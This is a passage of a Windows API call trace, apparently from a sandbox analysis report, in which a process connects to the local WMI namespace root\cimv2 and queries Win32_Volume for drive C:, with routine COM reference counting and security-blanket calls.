	[0172.295] CoGetClassObject (in: rclsid=0x1b8026f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cc70 | out: ppv=0x1c80cc70*=0x1c8217d0) returned 0x0
	[0172.298] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8217d0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c980 | out: ppvObject=0x1c80c980*=0x0) returned 0x80004002
	[0172.298] WbemLocator:IClassFactory:CreateInstance (in: This=0x1c8217d0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c968 | out: ppvObject=0x1c80c968*=0x1c8316b0) returned 0x0
	[0172.299] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8316b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c870 | out: ppvObject=0x1c80c870*=0x1c8316b0) returned 0x0
	[0172.299] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8316b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8f0 | out: ppvObject=0x1c80c8f0*=0x0) returned 0x80004002
	[0172.299] WbemLocator:IUnknown:AddRef (This=0x1c8316b0) returned 0x3
	[0172.300] CoGetContextToken (in: pToken=0x1c80c540 | out: pToken=0x1c80c540) returned 0x0
	[0172.300] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8316b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c500 | out: ppvObject=0x1c80c500*=0x0) returned 0x80004002
	[0172.300] CoGetContextToken (in: pToken=0x1c80c510 | out: pToken=0x1c80c510) returned 0x0
	[0172.300] WbemLocator:IUnknown:AddRef (This=0x1c8316b0) returned 0x4
	[0172.300] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8316b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c628 | out: ppvObject=0x1c80c628*=0x0) returned 0x80004002
	[0172.300] WbemLocator:IUnknown:Release (This=0x1c8316b0) returned 0x3
	[0172.300] WbemLocator:IUnknown:Release (This=0x1c8316b0) returned 0x2
	[0172.300] WbemLocator:IUnknown:Release (This=0x1c8217d0) returned 0x0
	[0172.301] WbemLocator:IUnknown:Release (This=0x1c8316b0) returned 0x1
	[0172.302] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0172.302] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0172.302] WbemLocator:IUnknown:AddRef (This=0x1c8316b0) returned 0x2
	[0172.302] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8316b0, riid=0x1c80cbb0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80cb90 | out: ppvObject=0x1c80cb90*=0x1c8316b0) returned 0x0
	[0172.303] WbemLocator:IUnknown:Release (This=0x1c8316b0) returned 0x2
	[0172.303] WbemLocator:IUnknown:Release (This=0x1c8316b0) returned 0x1
	[0172.303] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0172.303] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=8, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0172.303] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=8, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.314] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c80cc80 | out: ppv=0x1c80cc80*=0x1c831720) returned 0x0
	[0172.315] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c831720, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c80cf10 | out: ppNamespace=0x1c80cf10*=0x1c8344f8) returned 0x0
	[0172.515] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8344f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80caf8 | out: ppvObject=0x1c80caf8*=0x1b807370) returned 0x0
	[0172.515] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b807370, pProxy=0x1c8344f8, pAuthnSvc=0x1c80caf0, pAuthzSvc=0x1c80caec, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8, pImpLevel=0x1c80cb04, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00 | out: pAuthnSvc=0x1c80caf0*=0xa, pAuthzSvc=0x1c80caec*=0x0, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8*=0x6, pImpLevel=0x1c80cb04*=0x2, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00*=0x1) returned 0x0
	[0172.515] WbemLocator:IUnknown:Release (This=0x1b807370) returned 0x1
	[0172.516] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8344f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca98 | out: ppvObject=0x1c80ca98*=0x1b8073b0) returned 0x0
	[0172.516] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8344f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca28 | out: ppvObject=0x1c80ca28*=0x1b807370) returned 0x0
	[0172.516] WbemLocator:IClientSecurity:SetBlanket (This=0x1b807370, pProxy=0x1c8344f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.516] WbemLocator:IUnknown:Release (This=0x1b807370) returned 0x2
	[0172.516] WbemLocator:IUnknown:Release (This=0x1b8073b0) returned 0x1
	[0172.516] CoTaskMemFree (pv=0x1b80c230) 
	[0172.516] WbemLocator:IUnknown:Release (This=0x1c831720) returned 0x0
	[0172.516] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8344f8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c710 | out: ppvObject=0x1c80c710*=0x1b8073b0) returned 0x0
	[0172.517] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8073b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c790 | out: ppvObject=0x1c80c790*=0x0) returned 0x80004002
	[0172.524] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8073b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c528 | out: ppvObject=0x1c80c528*=0x0) returned 0x80004002
	[0172.527] WbemLocator:IUnknown:AddRef (This=0x1b8073b0) returned 0x3
	[0172.528] CoGetContextToken (in: pToken=0x1c80c3e0 | out: pToken=0x1c80c3e0) returned 0x0
	[0172.528] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8073b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c3a0 | out: ppvObject=0x1c80c3a0*=0x1b807298) returned 0x0
	[0172.528] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807298, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c3d0 | out: pCid=0x1c80c3d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.528] WbemLocator:IUnknown:Release (This=0x1b807298) returned 0x3
	[0172.528] CoGetContextToken (in: pToken=0x1c80c3b0 | out: pToken=0x1c80c3b0) returned 0x0
	[0172.528] WbemLocator:IUnknown:AddRef (This=0x1b8073b0) returned 0x4
	[0172.528] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8073b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c8 | out: ppvObject=0x1c80c4c8*=0x1b807380) returned 0x0
	[0172.528] WbemLocator:IUnknown:Release (This=0x1b8073b0) returned 0x4
	[0172.529] WbemLocator:IRpcOptions:Query (in: This=0x1b807380, pPrx=0x1b8073b0, dwProperty=2, pdwValue=0x1c80c538 | out: pdwValue=0x1c80c538) returned 0x80004002
	[0172.529] WbemLocator:IUnknown:Release (This=0x1b807380) returned 0x3
	[0172.530] WbemLocator:IUnknown:Release (This=0x1b8073b0) returned 0x2
	[0172.530] CoGetContextToken (in: pToken=0x1c80c8b0 | out: pToken=0x1c80c8b0) returned 0x0
	[0172.530] CoGetContextToken (in: pToken=0x1c80c7f0 | out: pToken=0x1c80c7f0) returned 0x0
	[0172.530] WbemLocator:IUnknown:AddRef (This=0x1b8073b0) returned 0x3
	[0172.530] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8073b0, riid=0x1c80c930*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80c910 | out: ppvObject=0x1c80c910*=0x1c8344f8) returned 0x0
	[0172.531] WbemLocator:IUnknown:Release (This=0x1b8073b0) returned 0x3
	[0172.531] WbemLocator:IUnknown:Release (This=0x1c8344f8) returned 0x2
	[0172.533] WbemLocator:IUnknown:Release (This=0x1c8344f8) returned 0x1
	[0172.533] CoGetContextToken (in: pToken=0x1c80ceb0 | out: pToken=0x1c80ceb0) returned 0x0
	[0172.533] WbemLocator:IUnknown:AddRef (This=0x1b8073b0) returned 0x2
	[0172.534] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8073b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca80 | out: ppvObject=0x1c80ca80*=0x1b8073b0) returned 0x0
	[0172.534] WbemLocator:IUnknown:Release (This=0x1b8073b0) returned 0x2
	[0172.534] WbemLocator:IUnknown:Release (This=0x1b8073b0) returned 0x1
	[0172.534] CoGetContextToken (in: pToken=0x1c80cb50 | out: pToken=0x1c80cb50) returned 0x0
	[0172.534] CoGetContextToken (in: pToken=0x1c80ca90 | out: pToken=0x1c80ca90) returned 0x0
	[0172.534] WbemLocator:IUnknown:AddRef (This=0x1b8073b0) returned 0x2
	[0172.535] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8073b0, riid=0x1c80cbd0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80cbb0 | out: ppvObject=0x1c80cbb0*=0x1c8344f8) returned 0x0
	[0172.535] WbemLocator:IUnknown:Release (This=0x1b8073b0) returned 0x2
	[0172.535] WbemLocator:IUnknown:AddRef (This=0x1c8344f8) returned 0x3
	[0172.535] IWbemServices:ExecQuery (in: This=0x1c8344f8, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x1c80d048 | out: ppEnum=0x1c80d048*=0x1c8345f8) returned 0x0
	[0172.549] IUnknown:QueryInterface (in: This=0x1c8345f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc58 | out: ppvObject=0x1c80cc58*=0x1c834600) returned 0x0
	[0172.549] IClientSecurity:QueryBlanket (in: This=0x1c834600, pProxy=0x1c8345f8, pAuthnSvc=0x1c80cc50, pAuthzSvc=0x1c80cc4c, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48, pImpLevel=0x1c80cc64, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60 | out: pAuthnSvc=0x1c80cc50*=0xa, pAuthzSvc=0x1c80cc4c*=0x0, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48*=0x6, pImpLevel=0x1c80cc64*=0x2, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60*=0x1) returned 0x0
	[0172.549] IUnknown:Release (This=0x1c834600) returned 0x1
	[0172.549] IUnknown:QueryInterface (in: This=0x1c8345f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cbf8 | out: ppvObject=0x1c80cbf8*=0x1b8070b0) returned 0x0
	[0172.549] IUnknown:QueryInterface (in: This=0x1c8345f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cb88 | out: ppvObject=0x1c80cb88*=0x1c834600) returned 0x0
	[0172.549] IClientSecurity:SetBlanket (This=0x1c834600, pProxy=0x1c8345f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.557] IUnknown:Release (This=0x1c834600) returned 0x2
	[0172.557] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x1
	[0172.557] CoTaskMemFree (pv=0x1b80c260) 
	[0172.558] IUnknown:QueryInterface (in: This=0x1c8345f8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c830 | out: ppvObject=0x1c80c830*=0x1b8070b0) returned 0x0
	[0172.558] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8b0 | out: ppvObject=0x1c80c8b0*=0x0) returned 0x80004002
	[0172.559] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c648 | out: ppvObject=0x1c80c648*=0x0) returned 0x80004002
	[0172.561] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x3
	[0172.561] CoGetContextToken (in: pToken=0x1c80c500 | out: pToken=0x1c80c500) returned 0x0
	[0172.562] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c0 | out: ppvObject=0x1c80c4c0*=0x1b806f98) returned 0x0
	[0172.562] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b806f98, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c4f0 | out: pCid=0x1c80c4f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.562] WbemLocator:IUnknown:Release (This=0x1b806f98) returned 0x3
	[0172.562] CoGetContextToken (in: pToken=0x1c80c4d0 | out: pToken=0x1c80c4d0) returned 0x0
	[0172.562] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x4
	[0172.562] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c5e8 | out: ppvObject=0x1c80c5e8*=0x1b807080) returned 0x0
	[0172.562] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x4
	[0172.563] WbemLocator:IRpcOptions:Query (in: This=0x1b807080, pPrx=0x1b8070b0, dwProperty=2, pdwValue=0x1c80c658 | out: pdwValue=0x1c80c658) returned 0x80004002
	[0172.563] WbemLocator:IUnknown:Release (This=0x1b807080) returned 0x3
	[0172.563] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x2
	[0172.563] CoGetContextToken (in: pToken=0x1c80c9d0 | out: pToken=0x1c80c9d0) returned 0x0
	[0172.563] CoGetContextToken (in: pToken=0x1c80c910 | out: pToken=0x1c80c910) returned 0x0
	[0172.563] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x3
	[0172.563] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x1c80ca50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ca30 | out: ppvObject=0x1c80ca30*=0x1c8345f8) returned 0x0
	[0172.563] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x3
	[0172.563] IUnknown:Release (This=0x1c8345f8) returned 0x2
	[0172.564] IUnknown:Release (This=0x1c8345f8) returned 0x1
	[0172.564] WbemLocator:IUnknown:Release (This=0x1c8344f8) returned 0x2
	[0172.564] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80cff0 | out: puCount=0x1c80cff0*=0x2) returned 0x0
	[0172.564] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80cff0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cff0*=0x17, pszText=0x0) returned 0x0
	[0172.564] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80cff0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cff0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.567] CoGetContextToken (in: pToken=0x1c80cbf0 | out: pToken=0x1c80cbf0) returned 0x0
	[0172.567] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0172.567] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x2
	[0172.568] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x1c80cc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cc50 | out: ppvObject=0x1c80cc50*=0x1c8345f8) returned 0x0
	[0172.641] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x2
	[0172.642] IUnknown:AddRef (This=0x1c8345f8) returned 0x3
	[0172.642] IEnumWbemClassObject:Clone (in: This=0x1c8345f8, ppEnum=0x1c80d0b0 | out: ppEnum=0x1c80d0b0*=0x1c834788) returned 0x0
	[0172.652] IUnknown:QueryInterface (in: This=0x1c834788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cd08 | out: ppvObject=0x1c80cd08*=0x1c834790) returned 0x0
	[0172.652] IClientSecurity:QueryBlanket (in: This=0x1c834790, pProxy=0x1c834788, pAuthnSvc=0x1c80cd00, pAuthzSvc=0x1c80ccfc, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8, pImpLevel=0x1c80cd14, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10 | out: pAuthnSvc=0x1c80cd00*=0xa, pAuthzSvc=0x1c80ccfc*=0x0, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8*=0x6, pImpLevel=0x1c80cd14*=0x2, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10*=0x1) returned 0x0
	[0172.652] IUnknown:Release (This=0x1c834790) returned 0x1
	[0172.652] IUnknown:QueryInterface (in: This=0x1c834788, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cca8 | out: ppvObject=0x1c80cca8*=0x1b8076b0) returned 0x0
	[0172.652] IUnknown:QueryInterface (in: This=0x1c834788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc38 | out: ppvObject=0x1c80cc38*=0x1c834790) returned 0x0
	[0172.653] IClientSecurity:SetBlanket (This=0x1c834790, pProxy=0x1c834788, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.668] IUnknown:Release (This=0x1c834790) returned 0x2
	[0172.668] WbemLocator:IUnknown:Release (This=0x1b8076b0) returned 0x1
	[0172.668] CoTaskMemFree (pv=0x1b80c290) 
	[0172.668] IUnknown:QueryInterface (in: This=0x1c834788, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c8d0 | out: ppvObject=0x1c80c8d0*=0x1b8076b0) returned 0x0
	[0172.668] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8076b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c950 | out: ppvObject=0x1c80c950*=0x0) returned 0x80004002
	[0172.670] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8076b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c6e8 | out: ppvObject=0x1c80c6e8*=0x0) returned 0x80004002
	[0172.677] WbemLocator:IUnknown:AddRef (This=0x1b8076b0) returned 0x3
	[0172.677] CoGetContextToken (in: pToken=0x1c80c5a0 | out: pToken=0x1c80c5a0) returned 0x0
	[0172.678] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8076b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c560 | out: ppvObject=0x1c80c560*=0x1b807598) returned 0x0
	[0172.678] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807598, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c590 | out: pCid=0x1c80c590*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.678] WbemLocator:IUnknown:Release (This=0x1b807598) returned 0x3
	[0172.678] CoGetContextToken (in: pToken=0x1c80c570 | out: pToken=0x1c80c570) returned 0x0
	[0172.678] WbemLocator:IUnknown:AddRef (This=0x1b8076b0) returned 0x4
	[0172.678] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8076b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c688 | out: ppvObject=0x1c80c688*=0x1b807680) returned 0x0
	[0172.678] WbemLocator:IUnknown:Release (This=0x1b8076b0) returned 0x4
	[0172.678] WbemLocator:IRpcOptions:Query (in: This=0x1b807680, pPrx=0x1b8076b0, dwProperty=2, pdwValue=0x1c80c6f8 | out: pdwValue=0x1c80c6f8) returned 0x80004002
	[0172.678] WbemLocator:IUnknown:Release (This=0x1b807680) returned 0x3
	[0172.679] WbemLocator:IUnknown:Release (This=0x1b8076b0) returned 0x2
	[0172.679] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0172.679] CoGetContextToken (in: pToken=0x1c80c9b0 | out: pToken=0x1c80c9b0) returned 0x0
	[0172.679] WbemLocator:IUnknown:AddRef (This=0x1b8076b0) returned 0x3
